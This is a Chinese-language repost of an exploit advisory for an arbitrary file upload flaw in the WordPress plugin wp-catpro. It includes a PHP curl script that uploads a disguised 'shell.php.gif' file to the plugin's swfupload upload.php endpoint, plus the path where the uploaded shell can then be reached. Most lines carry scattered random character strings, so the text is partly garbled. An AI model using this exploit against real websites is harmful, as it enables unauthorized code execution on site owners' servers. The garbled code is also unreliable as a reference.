WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
* z) |( M3 ^5 s8 P3 K! x2 k#-----------------------------------------------------------------------

0 R, k% v( W0 q! ]5 E% m# o3 E作者  => Zikou-16
  r$ N! y: Q( O: b3 e4 }% p* A邮箱 => zikou16x@gmail.com
# B, R8 N4 N" T2 e% m测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
+ D' [* o) g7 L  o8 q####
- O1 t' B6 a3 r% H
#=> Exploit 信息:
+ A% O& v6 A! Y0 z1 i------------------
$ I& L9 H4 c$ }' L8 y0 V; s# 攻击者可以上传 file/shell.php.gif
8 V& X$ e# f6 y# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
1 a7 D0 K0 E  d3 j0 s# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
5 C% ]. V" [: Q6 [/ C( `------------------

  J- a- v$ r' j3 G! [/ r* X#=> Exploit
-----------
<?php

9 C/ Z  {/ F) y, E1 M  i- V/ p. A$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
) N! y6 w' Y  ?+ i+ v: W, w% e8 ~- [curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
" o# K, R+ Y2 ?" c'folder'=>'/wp-content/uploads/catpro/'));
6 G) F$ x3 g( `curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1 |7 ~7 g- ?; G' I3 q$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
& I" i7 L! y& s0 F7 F# `3 O
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
<?php
phpinfo();
  w6 B% r% _% N0 X8 a8 D?>